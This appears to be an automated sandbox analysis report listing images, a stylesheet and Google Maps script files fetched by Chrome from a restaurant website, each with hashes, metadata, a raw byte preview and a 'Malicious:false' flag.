                                                                                                                                                    Preview:......Exif..MM.*...........................@...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:27 19:03:07.............0221..................................................................r...........z.(.................................,.......H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................7.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..Q.A........7.$^.I.H.>J.-..M..+...$.I.WY....7[kL~..I>5.....R.. ......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 55 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):20129
                                                                                                                                                    Entropy (8bit):3.5982825838960095
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:UvOkEW0EPxNXepSFyWec9Z4S30229Hy9EJ9E4wj77i9zMV0EOpKJWr7K7Ri31oP7:9kIMAqNcVJ9E5P7yMVGroiFeVz
                                                                                                                                                    MD5:F9B6C6D457455CB194B5DFD705CF7C68
                                                                                                                                                    SHA1:4A8B3D74C67FFAEA67966D8DC221B734CD16EAFF
                                                                                                                                                    SHA-256:A10A2B9FEB722C778166FB019E0767694E45F98859F7F61161B81EEBB66B0837
                                                                                                                                                    SHA-512:5C88266EC36BB2E799AB34964E4B04F372D38698207820ACB725E030F60902FD06E09DC8E2021A522330003DA66BE67442904D83A614276BD91AFDF8E79C645A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...7...0.............pHYs...t...t..f.x..?ciTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmpMM:DocumentID>adobe:docid:photoshop:5365af65-0790-11ed-8b31-efd80a687273</xmpMM:DocumentID>. <xmpMM:InstanceID>xmp.iid:dde93920-00bd-be
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 87 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):37004
                                                                                                                                                    Entropy (8bit):5.867000437866873
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:0tdDi+UU5mh+8H0aAl21ChmpRBDLvcjLXk:+JR32EhmPpcXXk
                                                                                                                                                    MD5:7477261A907206BF834D9AE03F67A788
                                                                                                                                                    SHA1:E729168B525AB6B31D9E09BE38B19E552135825F
                                                                                                                                                    SHA-256:1B88859E30F2A2BD89279298D5C1313AA5F110256326A2B972E269F44A30F5F6
                                                                                                                                                    SHA-512:07ADCC34E8BD20955C8BD9196927AE8A102E77E2AE2D9732CDB9681BAA5EB21EC86A99AE6721CD465310A87560500DD568CA8C9003C14956EEB59ACB469E3597
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...W...K.............pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 129 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):43957
                                                                                                                                                    Entropy (8bit):6.313206340886888
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:kidDi9EU5QH2s5+MRtNDfSdR0izQTI+zg7UkCJ:TvWs5+etNDKdR0yR++E
                                                                                                                                                    MD5:E186BEE2FC9AB88529477DF11E46E5BD
                                                                                                                                                    SHA1:942AC36329E109BC75DD016B602BEE29F7D0C279
                                                                                                                                                    SHA-256:DF2C61F3F21961B8F135F1A1CE4DD37E23A2DBFD0401E2028B61E5CD6AD30C05
                                                                                                                                                    SHA-512:BBCBD7399DB42113C5B7D782AAE68AD32D6BCBE7329D2090B5DF548DF8EC8AA7B033989516661BC2B84B106FC2AB434B6256AC23A18A1C5E943B61F09A6CCCD3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR.......K.....W......pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):85483
                                                                                                                                                    Entropy (8bit):7.3708148136481855
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:XscDVGpgNTgbyaFTDeUuG0VjKsI6YPraCf1bHQURKdso:VDVGpgNqyaFEFT4raHZdX
                                                                                                                                                    MD5:988C6467CE61CAB183CEEEF73182492C
                                                                                                                                                    SHA1:3A31226C1B24BAB7D16B83B13B4082DB2FB60FC2
                                                                                                                                                    SHA-256:DDCBF3EE39264DB24D32901F582A9A1B1C1696C1A676C9B0BA38C585A84562D1
                                                                                                                                                    SHA-512:764D31D0197E30169E63CD302ECFDAA66F2423F2B57D2860C1CCA22E1DF1611974E7C6AE4305A7F51804860F1A155DBBE4DCF58AC2FA2336A3529B0499C93F3E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/cook_lunch.png
                                                                                                                                                    Preview:.PNG........IHDR.............=..2....pHYs...............?ciTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmpMM:DocumentID>adobe:docid:photoshop:8e4a2129-0cad-11ed-a552-baea9d3ae441</xmpMM:DocumentID>. <xmpMM:InstanceID>xmp.iid:dd39fb74-5160-db
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 1300 x 519, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):603860
                                                                                                                                                    Entropy (8bit):7.946881415259013
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:s+Hgx/GqFSo/aaVzMV+LxCVv1WcvY8c6JutwLd9edshxLENU/Y:PafxNYlVv1JwMysh+0Y
                                                                                                                                                    MD5:3F5EF17FF88EBA8C56A23874B3080FBD
                                                                                                                                                    SHA1:E55A10797E5D55B7627EAF291B531D80869775E0
                                                                                                                                                    SHA-256:750A7DCB4FE5EB05BB29CBB2C000B99FAB0E57695BEE3E7684C35E4FDACB5ACD
                                                                                                                                                    SHA-512:9E1E17DCB5D1204DF3E9710581D68ABF25538B98398EAD2DF18D3416ECBBBCC0108354191B55C0A2EA1492E2E1DE1EFCA33E0984BE5D626F071F0D4FC1DD68D5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/Banner_index_image.png
                                                                                                                                                    Preview:.PNG........IHDR................S....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 86 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):36125
                                                                                                                                                    Entropy (8bit):5.768276573722191
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:750wRdDiXkT5tU5evx6oyNrX6QAaS3WpLQ1JAjkE5SsXdT:NDdDiXUU5evxydeau13AltT
                                                                                                                                                    MD5:D3CB337BB8CD77874A8294B3B6FC5F20
                                                                                                                                                    SHA1:C91BA2ECFB05446F0B90C5EC70861A11C257E10F
                                                                                                                                                    SHA-256:40E0F569C2DAE9218E903CB18E0D2F9E127167D02E6D74A9F5E7D07705AC4F75
                                                                                                                                                    SHA-512:1BB21763504AD256E95DD63500871927806F9E6644D9B42E996DEFA62A7F2F44E8A035FB36262A4408DE39D76E03E44AF588B59FE3084CBF07DC81F4026BD226
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...V...K.......p.....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 1920 x 456, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):147378
                                                                                                                                                    Entropy (8bit):7.924169770810001
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:Cc1YND1foHquMJe/0OVBbbdf4IxfndmnrI7zRO:CjyweRV9dQI1dmnwzRO
                                                                                                                                                    MD5:39D86CC57691F95BA5B1BE4BA9C5C943
                                                                                                                                                    SHA1:F49A6B6562F1ABDEA8DEE31F2D2E2E4F60DDCB5E
                                                                                                                                                    SHA-256:9BA4BE94A0BED00293D0B71C1CD156368FE65080BA5D67D35C5F98DD3FD128F8
                                                                                                                                                    SHA-512:03F20F9C10946224F52DBFBD3D64DB9737396C57AE8E2ACC217517F4ADFCC2010C0F314382E3EE31ABA93BFE39D6BD8CB09083932D73027A20678C1BAAB8660C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/back_2.png
                                                                                                                                                    Preview:.PNG........IHDR............. .`.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2014 (Windows)" xmpMM:InstanceID="xmp.iid:12B5F284FF4211E6947497ED1D14837D" xmpMM:DocumentID="xmp.did:12B5F285FF4211E6947497ED1D14837D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:12B5F282FF4211E6947497ED1D14837D" stRef:documentID="xmp.did:12B5F283FF4211E6947497ED1D14837D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..W...<"IDATx...#..gj.O.""3.y.{.....W....)}....%.6.|$n.>......m......3.....E.....n...-.7....?.u.I.#I..]..8...
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:assembler source, ASCII text, with CRLF line terminators
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):27894
                                                                                                                                                    Entropy (8bit):5.095978578510276
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:wk+frK+G9yMmj7NgPXE0rho6jzISJQfe/lW3LguLroqCbXl:B0+PF1rnLj
                                                                                                                                                    MD5:2BD8DDB31B201BC39A0D180A6F3E3C51
                                                                                                                                                    SHA1:22A57A7ACA4D2FA8E69B0469C04C252E449D407C
                                                                                                                                                    SHA-256:A4E5B60EBEDDA65E56F389880D8AB2E688DF0664DC9C411060F3D9B25D20B20A
                                                                                                                                                    SHA-512:318B25DABB2E6F071B40F48049265E7C682F5B3E5C6328FE4F14B869EAE24C2B7E5CBA4BCF06116C0BF14F653851DBE0BEA5F564F11B086522C2509258237912
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Preview:/*------------------------------------------------------------------.. Home page sliders ..-------------------------------------------------------------------*/.....container-fluid3 {.. width: 100%;...height: auto;.. padding-right: 0px;.. padding-left: 0px;.. margin-right: 0px;.. margin-left: 0px;..}.... /********* Header Text ****************/ .. .text_box_ani{...margin-top:150px;.. }.. .animate_head {...animation: opacity 3.5s both;.. }..@keyframes opacity {...0% {... opacity: 0;...}...100% {... opacity: 1;...}.. }..../*------------------------------------------------------------------.. Headers for other pages ..-------------------------------------------------------------------*/.. /********* recipe Page ****************/ ...header1 {...height: 75vh;...max-height: 750px;...background: url(../imgs/back_2.png) no-repeat center center fixed;...background-size: cover;...min-height: 600px;.. }.. .. .header1 .overlay {...height: 100%;...background: rgba(3
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (802)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):3308
                                                                                                                                                    Entropy (8bit):5.5083394341383904
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:fHKvPwII+sSQx+GzETrVdA6wcA411GbwIkBpCN63K91jJahGIdL2wl+nsIEGbR4t:fAwzx/5YTrVdB17I+puX7jECwljI1P2L
                                                                                                                                                    MD5:2334D2C9424FC203B6672293A25994E8
                                                                                                                                                    SHA1:D4CEFB27836F8BE576CC45C9BB0F5BA3AD281E52
                                                                                                                                                    SHA-256:CE8FDEE05819227CE1A5EEC4B1B59B68599B26A414F5CA5343BFF490D4A6ED56
                                                                                                                                                    SHA-512:11AC863540AB8EFD442986151E3CE798EE53FDC13C03F369380D5D37DE2D3405A1502AF88CD98BAC81E0ABE62B65B11F25F9DEFEDA94645D8B2995AB4A338D71
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/geometry.js
                                                                                                                                                    Preview:google.maps.__gjsload__('geometry', function(_){var zsa=function(a,b){return Math.abs(_.fj(b-a,-180,180))},Asa=function(a,b,c,d,e){if(!d){c=zsa(a.lng(),c)/zsa(a.lng(),b.lng());if(!e)return e=Math.sin(_.Di(a.lat())),e=Math.log((1+e)/(1-e))/2,b=Math.sin(_.Di(b.lat())),_.Ei(2*Math.atan(Math.exp(e+c*(Math.log((1+b)/(1-b))/2-e)))-Math.PI/2);a=e.fromLatLngToPoint(a);b=e.fromLatLngToPoint(b);return e.fromPointToLatLng(new _.al(a.x+c*(b.x-a.x),a.y+c*(b.y-a.y))).lat()}e=_.Di(a.lat());a=_.Di(a.lng());d=_.Di(b.lat());b=_.Di(b.lng());c=_.Di(c);return _.fj(_.Ei(Math.atan2(Math.sin(e)*.Math.cos(d)*Math.sin(c-b)-Math.sin(d)*Math.cos(e)*Math.sin(c-a),Math.cos(e)*Math.cos(d)*Math.sin(a-b))),-90,90)},Bsa=function(a,b){a=new _.Mj(a,!1);b=new _.Mj(b,!1);return a.equals(b)},Csa=function(a,b){const c=[];let d=[0,0],e;for(let f=0,g=_.Yi(a);f<g;++f)e=b?b(a[f]):a[f],rA.tE(e[0]-d[0],c),rA.tE(e[1]-d[1],c),d=e;return c.join("")},sA={containsLocation:function(a,b){a=_.Rj(a);const c=_.fj(a.lng(),-180,180),d=!!b.get
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 105 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):39243
                                                                                                                                                    Entropy (8bit):6.026473604157181
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:D50wTdDi5k759U5mu6C/9s/Pb2ZmfCkUrwQkIEzTiRVRbee:FtdDi5cU5D6C/9gPqUfRAkHiRVRbee
                                                                                                                                                    MD5:E0D2250135101D893CD10DC36309633C
                                                                                                                                                    SHA1:51D7BD051DD026C0F37824499332555412728E9C
                                                                                                                                                    SHA-256:90F933EC0781D7F01392BF6621748678A623D07EEB5BBB9598AD5C52A83FFB0E
                                                                                                                                                    SHA-512:402FA4009E1AD6F9B0233375DFBEAE0D48E807B2F21CABCF7892A3B4109CC218BC8455AE6FD17029261AB5FA5E243446CC4E56C12B03148E1489D8A84C832C1E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Vegetarian_Ashaak.png
                                                                                                                                                    Preview:.PNG........IHDR...i...K.....s......pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):195846
                                                                                                                                                    Entropy (8bit):7.956268982547781
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:pkk7kkfkOZLWTr2U2EaBRFmS4G/f0Z5eHot0qgDzHWaI6tJfEDVD/DlFNmJrt5Ke:pPbkOHpXBRFmS4G/f0zethzHR4VdmVGe
                                                                                                                                                    MD5:E49859DC22ED1A21101CEC386BE81C69
                                                                                                                                                    SHA1:40477513D80E718D4BA5DA69972CD48EB6401940
                                                                                                                                                    SHA-256:CDA4AFCE433498366BB76FF27C118951FA3AD5E94C203F34BD9EE770AE40E58A
                                                                                                                                                    SHA-512:0583B4F0CEA63A0D18384A6B8D9E537265AD0020C23AFE10275D9F769CE32BCF78ADB2921FF2A4F30D86EA14E13FBDFF83D4F6FBE95734B12A49307D5ED4C602
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-m-8.jpg
                                                                                                                                                    Preview:......Exif..MM.*...............@...........,...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:19:17.............0221...................................................................r...........z.(................................-........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..{...x....w!l..Z w'...a...#^AS...;...k..$^..m....cE...s.......X,`......o..
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JSON data
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):3
                                                                                                                                                    Entropy (8bit):1.584962500721156
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:P:P
                                                                                                                                                    MD5:8A80554C91D9FCA8ACB82F023DE02F11
                                                                                                                                                    SHA1:5F36B2EA290645EE34D943220A14B54EE5EA5BE5
                                                                                                                                                    SHA-256:CA3D163BAB055381827226140568F3BEF7EAAC187CEBD76878E0B63E9E442356
                                                                                                                                                    SHA-512:CA4B6DEFB8ADCC010050BC8B1BB8F8092C4928B8A0FBA32146ABCFB256E4D91672F88CA2CDF6210E754E5B8AC5E23FB023806CCD749AC8B701F79A691F03C87A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://maps.googleapis.com/maps/api/mapsjs/gen_204?csp_test=true
                                                                                                                                                    Preview:{}.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 90 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):37135
                                                                                                                                                    Entropy (8bit):5.855502032880323
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:f50wRdDiTkZ55U5L/if6cXacdU6KW4QkI/VbbR4J5gidI:hDdDiTWU5LafzXaP6f4nIdp4/gidI
                                                                                                                                                    MD5:ADDC8AADDDB37CB5CF3CE893B3876AF3
                                                                                                                                                    SHA1:65EBB7FC2C3D00124C62780E3E3047D19A961D9C
                                                                                                                                                    SHA-256:4E6BCC3BDCD13B3FE53078EDB9BB54E17971F23BA59BEF9103399129BF9A93E5
                                                                                                                                                    SHA-512:941E6E021851B6A0B5F7A9A2FCC6C58786439BAD5F40DADA1ACEC309A042D10F6FB8587A2763C00A12B149C3B7C8D5694DAC83FAA23649A28A5499896399AF3B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Meat_Ball_Curry.png
                                                                                                                                                    Preview:.PNG........IHDR...Z...K......".<....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (7389), with CRLF line terminators
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):32745
                                                                                                                                                    Entropy (8bit):5.5202430539204945
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:VEyp1852zYQ1dTztrrobv75fld1qmSF2z2zYQ1dTztrrobv75fld1qmSF2C:ayp64BX
                                                                                                                                                    MD5:3BCE5EF376DE017371E94AECEA1AD1FB
                                                                                                                                                    SHA1:D820B0C22A7624C89D229F2435573A16F296A182
                                                                                                                                                    SHA-256:AE89EE9F15B00F305F7B05B3A094A793F228A4980BF65058ABD7FB5AEFFB2E5D
                                                                                                                                                    SHA-512:042CD80AB421CBF9B1E07F60450DEBDF8A7C65BB8F48181CB61AA3D6C1BBF50946C4AB031747F89820963B8BEFD9778AC645526AE1FF0CAF5E249CE8A4760307
                                                                                                                                                    Malicious:false
